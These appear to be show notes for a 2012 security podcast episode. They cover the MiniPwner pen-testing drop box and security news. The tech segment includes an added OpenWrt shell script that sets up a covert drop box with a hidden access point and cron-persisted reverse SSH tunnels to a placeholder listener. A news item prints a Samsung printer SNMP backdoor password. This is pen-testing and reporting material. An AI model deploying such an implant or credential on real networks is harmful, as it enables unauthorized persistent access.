Episode310

From Paul's Security Weekly
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security

Episode Media

MP3

Announcements & Shameless Plugs

PaulDotCom Security Weekly - Episode 309 for Tuesday November 20th, 2012

  • BSides everywhere, baby! There is likely one near you, so check the web site www.securitybsides.com. The next local BSides is in Boston on February 23rd.
  • Please fill out Intern Mike's survey for which locations and what SANS Mentor-led courses you'd like to see in the Boston-area.

Tech Segment: MiniPwner (TP-Link TL-WR703n Pen Testing Drop Box)

Background

The MiniPwner is a pen-testing drop box. Before the MiniPwner we used a Pwnie Express or an Apple travel router as the drop box on physical penetration tests, but those depended on a known IP addressing scheme or DHCP, a power outlet next to an open network port, and unfiltered Internet access, none of which you can count on finding at a target site. My wish list for a home-built drop box was a router that was small, inexpensive and OpenWrt-supported, had wired and wireless interfaces and room for a USB drive, and could run on battery, all without soldering or custom firmware. The TL-WR703N had just become available with OpenWrt support and looked like a perfect fit.

Incarryingcase1.png

What Makes it Cool

  • TL-WR703N is cheap (under $25)
  • Small but powerful - Wired, Wireless, USB, battery power
  • No need to compile firmware or do any soldering to build a MiniPwner
  • Flexibility - add whatever packages you desire

MiniPwner Build Overview

What you'll need:

  • TP-Link TL-WR703N (or the slightly larger TL-MR3020)
  • USB flash drive (I like the low profile Cruzer Fit drives)
  • Battery Pack (I get the Sharper Image charger kit)
  • Ethernet cable, velcro

High Level Build Steps

  1. Download the current OpenWrt firmware from downloads.openwrt.org or the 5/14/2012 "DerbyCon" build off minipwner.com.
  2. Use the web interface of the factory firmware to flash the router.
  3. Configure the network.
  4. Mount the USB drive.
  5. Download and install the security packages.

Some of the packages in the build script include: Nmap, Tcpdump, Aircrack-ng, Kismet, Openvpn, Airpwn, Dsniff, SSLsniff, Parasite, Reaver, Nbtscan, Snort

The "DerbyCon" build uses the nightly snapshot from 5/14/2012 with a couple of modifications: a custom build script is placed in /user/share after the firmware is applied, and Reaver has been added to the package repository. It is the only build I know of with Dsniff, Kismet and Reaver all working.
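The following first-boot script is an added example for steps 3 to 5 above plus a call-home channel; it is not the MiniPwner project's build script and not code from the episode. It assumes an OpenWrt image with uci, opkg, block-mount and dropbear's ssh client (dbclient) on board. Every address, SSID, passphrase, account name and path in it is a placeholder for this example: 203.0.113.10 is an RFC 5737 documentation address standing in for the tester's listener, "dropbox" is a hypothetical restricted account on that listener, and /root/minipwner-setup.sh is where the script is assumed to live on the router. With no arguments it only prints what it would write; on the router, `sh minipwner-setup.sh apply` applies it.

```shell
#!/bin/sh
# Added example: first-boot set-up of an OpenWrt TL-WR703N as a drop box.
# Not the MiniPwner project's build script. Assumes OpenWrt with uci, opkg,
# block-mount and dropbear's client; every value below is a placeholder.

# ---- Tunables (all assumed values) -------------------------------------
CALLBACK_HOST="${CALLBACK_HOST:-203.0.113.10}"   # tester's listener (RFC 5737 doc address)
CALLBACK_PORT="${CALLBACK_PORT:-443}"            # outbound TCP port egress filters usually allow
CALLBACK_USER="${CALLBACK_USER:-dropbox}"        # dedicated, restricted account on the listener
REVERSE_PORT="${REVERSE_PORT:-2222}"             # listener-side port that leads back to the box's sshd
CALLBACK_KEY="${CALLBACK_KEY:-/root/.ssh/id_dropbear}"
USB_DEV="${USB_DEV:-/dev/sda1}"
USB_MOUNT="${USB_MOUNT:-/mnt/usb}"
SELF="${SELF:-/root/minipwner-setup.sh}"         # where this script sits on the router
PACKAGES="kmod-usb-storage block-mount kmod-fs-ext4 nmap tcpdump openvpn"

# Step 3, network: the wired port becomes a DHCP client so the box works on
# whatever addressing the target uses, and the radio becomes a WPA2 AP on a
# fixed address so the tester can reach it from nearby without touching the
# target's network. Output is a 'uci batch' script.
render_network_uci() {
  cat <<'EOF'
set network.lan.proto='dhcp'
set network.mgmt='interface'
set network.mgmt.proto='static'
set network.mgmt.ipaddr='192.168.77.1'
set network.mgmt.netmask='255.255.255.0'
set wireless.radio0.disabled='0'
set wireless.@wifi-iface[0].mode='ap'
set wireless.@wifi-iface[0].network='mgmt'
set wireless.@wifi-iface[0].ssid='svc-maint'
set wireless.@wifi-iface[0].encryption='psk2'
set wireless.@wifi-iface[0].key='CHANGE-ME-to-a-long-random-passphrase'
commit network
commit wireless
EOF
}

# Step 4, USB: an /etc/config/fstab entry for block-mount so the drive that
# carries the tools and captures is mounted at boot.
render_fstab_config() {
  cat <<EOF
config mount
    option target '$USB_MOUNT'
    option device '$USB_DEV'
    option fstype 'ext4'
    option options 'rw,sync'
    option enabled '1'
    option enabled_fsck '0'
EOF
}

# Call-home: a reverse SSH tunnel to the listener, so the box is reachable
# even when the target filters inbound traffic and the box's address is
# unknown. dbclient flags: -y accept the host key on first contact, -N no
# shell, -R expose the box's own sshd on REVERSE_PORT of the listener's loopback.
callback_cmd() {
  printf 'ssh -y -i %s -p %s -N -R %s:127.0.0.1:22 %s@%s' \
    "$CALLBACK_KEY" "$CALLBACK_PORT" "$REVERSE_PORT" "$CALLBACK_USER" "$CALLBACK_HOST"
}

# Watchdog target: (re)start the tunnel unless the recorded pid is still alive.
start_callback() {
  pidfile=/var/run/callback.pid
  if [ -f "$pidfile" ] && kill -0 "$(cat "$pidfile")" 2>/dev/null; then
    return 0                       # tunnel still up, nothing to do
  fi
  eval "$(callback_cmd) >/dev/null 2>&1 &"
  echo $! > "$pidfile"
}

# Cron line (OpenWrt keeps root's crontab in /etc/crontabs/root).
render_crontab() {
  printf '*/5 * * * * %s callback\n' "$SELF"
}

# Step 5 plus all of the above, applied for real. Refuses to run off the router.
apply_on_openwrt() {
  command -v uci >/dev/null 2>&1 || { echo "uci not found; not on OpenWrt" >&2; return 1; }
  render_network_uci | uci batch
  render_fstab_config > /etc/config/fstab
  opkg update && opkg install $PACKAGES
  mkdir -p "$USB_MOUNT" /etc/crontabs
  [ -f "$SELF" ] || cp "$0" "$SELF"
  render_crontab >> /etc/crontabs/root
  /etc/init.d/cron enable && /etc/init.d/cron restart
  /etc/init.d/network restart
}

case "${1:-}" in
  apply)    apply_on_openwrt ;;
  callback) start_callback ;;
  *)        render_network_uci; echo; render_fstab_config; echo
            render_crontab; echo; callback_cmd; echo ;;   # dry run
esac
```

Two caveats that matter more than the packages list. The box carries a private key for the listener: make that listener account dedicated and restricted (an authorized_keys entry with `no-pty,command=...` and no forwarding beyond the one reverse port) and revoke the key the day the engagement ends, because a drop box that gets found hands its key to whoever found it. And `-y` accepts the listener's host key on first contact; pre-seeding the known_hosts file before deployment closes that window. Note also that a DHCP client shows up in the target's lease table and switch MAC tables, so what the wired DHCP setting buys is independence from the addressing scheme, not invisibility.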

Some of Kevin's favorite TL-WR703N Mods and Projects

Add a serial cable so you can re-flash a bricked router

Internal USB Hub Expansion

Hubmod.png

Karma (Jasager/WiFi Pineapple capabilities)

Meld the battery to the router

Pirate Box

Piratebox.png

Home Automation

Robot Control

Robot310.png


MintyPwner - MiniPwner guts shoved into an Altoids tin

Mintyopenzoom.JPG

Lots of other projects are in the WR703N OpenWrt forum.

Stories

Paul's Stories

  1. US-CERT: Samsung Printer Firmware Contains Backdoor - Oh, and here is the MIB - This is one gigantic flaming pile of crap. The entire thing, from firmware to vulnerability disclosure, it all sucks. So, once upon a time a developer decided it would be a good idea (likely sometime in 2004) to add in an SNMP backdoor. This means the device will listen on UDP port 1118 for SNMP traps. The same password of "s!a@m#n$p%c" will get you in and allow you to read (and write?) via SNMP. Samsung came out and said there was a vulnerability, and it affected Dell printers too. Samsung said they would produce a fix before the end of the year. They did not release the models that are vulnerable. Then they said they would have a fix for us tomorrow. In the meantime, they've pulled all the firmware downloads from their site. What are you hiding Samsung? What, you don't want us to know just how deep and wide your problems with firmware go? Now you've caught my attention, and the attention of lots of other firmware reverse engineering curious type people. I'm still on a mission to improve the security of embedded systems, and this is one reason why. I agree with some of the comments on Twitter, we are all to blame. Developers are to blame, users, and security folks for not working together and fixing the problem.
  2. NEOHAPSIS - Security Advisory - TP-LINK TL-WR841N LFI - Just an FYI, this does not require a password to execute; it's sorta like an LFI with a splash of authentication bypass. Not only that, but the web user can read the freaking /etc/shadow file according to the advisory. Holy face palm, Batman!
  3. Belkin wireless routers weak key - Who thinks it's a good idea to base the default key on the MAC address? Really? Just stop, don't put a default WPA/WPA2 key on the device. Let the user enter it, make a wizard or something. If the user can't figure out how to enter a password, they shouldn't use wireless. If they really want to use wireless, they should call the Geek Squad or something.
  4. The Hackback Debate | Steptoe Cyberblog - This was way too long to read, but I will read it at some point. There are a few articles a month on hacking back. There needs to be more.
  5. Prince William photos accidentally reveal RAF password | Naked Security - So, you work for the military. Doesn't even matter which military, and somehow you think it's a good idea to print out the username and password for a system, stick it on the wall, then let press take pictures? Super Fail, super fail, you're a super fail super fail!!!
  6. Backdoor found in Piwik analytics software - Update - The H Security: News and Features - Guess how the backdoor got there? If you guessed a vulnerable WordPress plugin you won the lottery! (Not really, someone from the Midwest and Arizona won, congrats to you, let's see how long before you go broke, crazy, or dead, and not in that order). I wonder if it was the Wordfence plugin, that's a security plugin that contains an XSS vulnerability. Think they could be more like Yahoo! and not have stupid XSS vulnerabilities, oh wait, never mind.
  7. Yahoo XSS exploits going for $700 - Yep, Yahoo! has XSS, could be fun to exploit this one, steal cookies, etc... Turns out it's so much fun that people are selling them for $700, which I think is low...
  8. ENISA promotes digital hacker traps - honeypots are powerful tools that CERTs (Computer Emergency Response Teams) can use to have "threat intelligence collected without any impact on production infrastructure". Amen to that, if you have your ducks in a row, deploy a honeypot today!
  9. Mobile browser vulnerability lets hackers steal cloud computing time - I think it's interesting that people used to steal computer time when the first computers were invented, now we've gone back to that.
  10. Top 5 Security Predictions for 2013 from ISF - This is the best advice ever: Organizations must prepare for the unpredictable so they have the resilience to withstand unforeseen, high impact events. Gee, thanks for that.
  11. Geek Researcher Spends Three Years Living With Hackers - Funny, after staring at people sitting in front of a computer who don't shower, she came to the conclusion that hackers are actually pretty boring and smelly people!
  12. US software firm hacked for years after suing China - The Empire Strikes Back should have been the title of this article...

Larry's stories

  1. Track students with RFID? Anonymous no likey - [Larry] - From the internet vigilantes division, a school in Texas decides to track student movement (that sucks, BTW, and so much fun). A student refused to be tracked, and Anonymous took issue with the school. Tango Down…
  2. YAY OSINT! - [Larry] - A neat new tool coming out of Kiwicon that utilizes keywords for monitoring various social media via API. Neat stuff!
  3. Hotel lock fail in the wild - [Larry] - Remember that hotel lock break-in method we've mentioned more than once in the past? Yeah, well, turns out a hotel in Houston suffered a number of break-ins as a result of the vulnerability.

Allison's stuff

  1. China hackers drive US software maker to the brink - This is a fascinating article and an excellent read. Even though the article didn't provide many technical details, it looked to me like the software company handled the attacks in the worst way possible. Why didn't they bring in outside help for the unexplained downtimes, or why didn't they investigate why revenues dropped with no explanation? Competent IT is hard to come by, and I think that's what really burned this small business in the end.
  2. W32/Autorun.worm.aaeb is another autorun worm blowing up networks - I've been seeing this blow up in the past few days. If you see your network shares filling up with files like porn.exe, sexy.exe, passwords.exe, you're infected!
  3. "Leaping Brain"'s DRM feature claims to provide "Fort Knox-Level Security" - From their site: "Video content is protected with our BrainTrust™ DRM, and is unplayable except by a legitimate owner. All aspects of the platform feature a near-ridiculous level of security." The encryption method: the first 15kB is XORed with "RANDOM_STRING". That's the actual string value.
  4. TheGrugq presents OPSEC for hackers - This is a fascinating lecture, as it presents various ways people have gotten busted.
  5. Swedish exchange is paralyzed by buy order for "-6 stocks" - While not strictly security related, I find this amusing. Any sufficiently horrible software can be pushed over no matter what you do...